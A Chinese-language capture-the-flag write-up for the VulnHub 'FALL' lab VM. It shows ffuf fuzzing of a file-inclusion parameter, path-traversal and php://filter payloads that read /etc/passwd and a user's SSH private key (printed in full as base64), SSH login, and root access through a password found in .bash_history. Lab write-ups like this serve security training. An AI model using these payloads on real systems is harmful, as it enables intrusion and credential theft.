准备:
攻击机:虚拟机kali、本机win10。
靶机:digitalworld.local: FALL,下载地址:https://download.vulnhub.com/digitalworld/FALL.7z,下载后直接vbox打开即可。
知识点:ffuf参数爆破、文件包含、ssh私匙登录、历史命令泄露敏感信息。
信息收集:
扫描下端口对应的服务:nmap -T4 -sV -A 192.168.110.110,显示开放了22、80、139、9090端口,开启了ssh、http、samba服务。
访问下web服务,发现一个疑是账户名:qiu,以及提示信息告诉我们存在测试脚本污染,那就进行下目录扫描。
目录扫描:
使用dirmap进行目录扫描,发现了test.php、robots.txt等文件。访问robots.txt文件未发现有用信息。访问test.php文件显示缺少参数。
ffuf参数爆破:
使用ffuf进行参数爆破,命令:ffuf -u 'http://192.168.110.110/test.php?FUZZ=../../../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 80,成功获得参数名称:file。最后的-fs是为了过滤下无用的返回信息,需要根据具体情况进行调整,这里使用-fs 80就可以。
访问下该文件:../../../../../../../etc/passwd,命令:http://192.168.110.110/test.php?file=../../../../../../../etc/passwd,证实账户:qiu的存在。
获取shell:
利用此文件包含漏洞读取下其私匙信息,命令:http://192.168.110.110/test.php?file=php://filter/read=convert.base64-encode/resource=/home/qiu/.ssh/id_rsa,这里我使用的是base64加密,未使用的时候读取时格式不太对,因此使用base64读取在进行解码。
id_rsa_base64
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJGd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFRRUF2TmpoT0ZPU2VESHk5SzV2bkhTczNxVGpXTmVoQVB6VDBzRDNiZUJQVnZZS1FKdDBBa0QwCkZEY1dUU1NGMTNOaGJqQ1FtNWZuelI4dGQ0c2pKTVlpQWwrdkFLYm9IbmUwbmpHa0J3ZHk1UGdtY1h5ZVpURUNJR2tnZ1gKNjFrSW1VT0lxdExNY2pGNXRpKzA5UkdpV2VTbWZJRHRUQ2pqLyt1UWxva1VNdGRjNE5PdjRYR0picDdHZEVXQlpldmllbgpxWG9YdEc2ajdnVWd0WFgxRnhseDNGUGh4RTNseHcvQWZaOWliMjFKR2xPeXk4Y2ZsVGxvZ3JaUG9JQ0NYSVYva3hHSzBkClp1Y3c4ckdHTWM2SnY3bnBlUVMxSVhVOVZuUDNMV2xPR0ZVMGorSVM1U2lOa3NSZmRRNG1DTjlTWWhBbTltQUtjWlc4d1MKdlh1RGpXT0xFd0FBQTlBUzV0Um1FdWJVWmdBQUFBZHpjMmd0Y25OaEFBQUJBUUM4Mk9FNFU1SjRNZkwwcm0rY2RLemVwTwpOWTE2RUEvTlBTd1BkdDRFOVc5Z3BBbTNRQ1FQUVVOeFpOSklYWGMyRnVNSkNibCtmTkh5MTNpeU1reGlJQ1g2OEFwdWdlCmQ3U2VNYVFIQjNMaytDWnhmSjVsTVFJZ2FTQ0JmcldRaVpRNGlxMHN4eU1YbTJMN1QxRWFKWjVLWjhnTzFNS09QLzY1Q1cKaVJReTExemcwNi9oY1lsdW5zWjBSWUZsNitKNmVwZWhlMGJxUHVCU0MxZGZVWEdYSGNVK0hFVGVYSEQ4QjluMkp2YlVrYQpVN0xMeHgrVk9XaUN0aytnZ0lKY2hYK1RFWXJSMW01ekR5c1lZeHpvbS91ZWw1QkxVaGRUMVdjL2N0YVU0WVZUU1A0aExsCktJMlN4RjkxRGlZSTMxSmlFQ2IyWUFweGxiekJLOWU0T05ZNHNUQUFBQUF3RUFBUUFBQVFBclhJRWFOZFpEMHZRK1NtOUcKTldRY0d6QTRqZ3BoOTZ1TGtOTS9YMm5ZUmRaRXoyenJ0NDVUdGZKZzlDbm5ObzhBaGhZdUk4c054a0xpV0FoUndVeTl6cwpxWUU3cm9oQVBzN3VrQzFDc0ZlQlVicWNtVTRwUGliVUVSZXM2bHlYRkhLbEJwSDdCbkV6Ni9CWTlSdWFHRzVCMkRpa2JCCjh0L0NETzc5cTdjY2ZUWnMrZ09WUlg0UFc2NDErY1p4bzUvZ0wzR2NkSndEWTRnZ1B3YlUvbThzWXN5TjFOV0o4TkgwMGQKWDhUSGFRQUVYQU82VFR6UE1MZ3dKaSswa2oxVVRnK0Qrbk9OZmg3eGVYTHNlU1QwbTFwK2U5Qy84cnNlWnNTSlN4b1hLawpDbUR5NjlhTW9kY3BXK1pYbDlOY2pFd3JNdkpQTExLamhJVWNJaE5qZjRBQkFBQUFnRXIzWktVdUpxdUJORlBoRVVnVWljCml2SG9aSDZVODJWeUVZMkJ6MjRxZXZjVnoySWNBWExCTElwK2Yxb2l3WVVWTUl1V1FEdzZMU29uOFM3MmtrN1ZXaURyV3oKbEhqUmZwVXdXZHpkV1NNWTZQSTdFcEdWVnMwcW1SQy9UVHFPSUgrRlhBNjZjRngzWDR1T0Nqa3pUMC9FczB1TnlaMDdxUQo1OGNHRThjS3JMQUFBQWdRRGxQYWpEUlZmRFdnT1dKaitpbVhmcEdzbW84MVVEYVlYd2tsenc0Vk0yU2ZJSElBRlpQYUEwCmFjbTQvaWNLR1BsbllXc3ZaQ2tzdmxVY2srdGkrSjJSUzJNcTlqbUtCMEFWWmlzRmF6ajhxSWRlM1NQUHd0UjdnQlIzMjkKSlczRGIrS0lTTVJJdmRwSnYrZWlLUUxnL2VwYlNkd1haaTBESm9CMGExNUZzSUFRQUFBSUVBMHVRbDBkMHAzTnhDeVQvKwpRNk4rbGxmOVRCNStWTmppbmFHdTREWTZxVnJTSG1oa2NlSHRYeEc2aDl1cFJ0S3c1QnZPbFNiVGF0bGZNWllVdGxaMW1MClJXQ1U4RDd2MVFuN3FNZmx4NGJsZFlnVjhsZjE4c2I2Zy91enRXSnVMcEZlM1VlL01MZ2VKKzJUaUF3OXlZb1BWeVNOSzgKdWhTSGEwZHZ2ZW9KOHhNQUFBQVpjV2wxUUd4dlkyRnNhRzl6ZEM1c2IyTmhiR1J2YldGcGJnRUMKLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==在kali上将base64解码后的数据写入到id_rsa文件并赋予600权限。然后使用id_rsa进行登录,命令:ssh qiu@192.168.110.110 -i id_rsa,成功获得shell权限。
在当前目录下发现local.txt文件,读取该文件获取到flag值。
提权:
查看下当前账户是否存在可以使用的特权命令,sudo -l,但是需要密码才可以。
查看当前用户下具有root权限的可执行文件都有哪些,命令:find / -perm -4000 -type f 2>/dev/null,发现了/usr/lib/polkit-1/polkit-agent-helper-1,但是相关的两个漏洞经测试均失败。
后来在当前目录下发现.bash_history文件,读取该文件时发现一串字符:remarkablyawesomE,疑是密码。
使用获得的字符串进行尝试切换root账户,成功切换到root账户并在/rrot目录下发现proof.txt文件,读取该文件,成功获取到flag值。
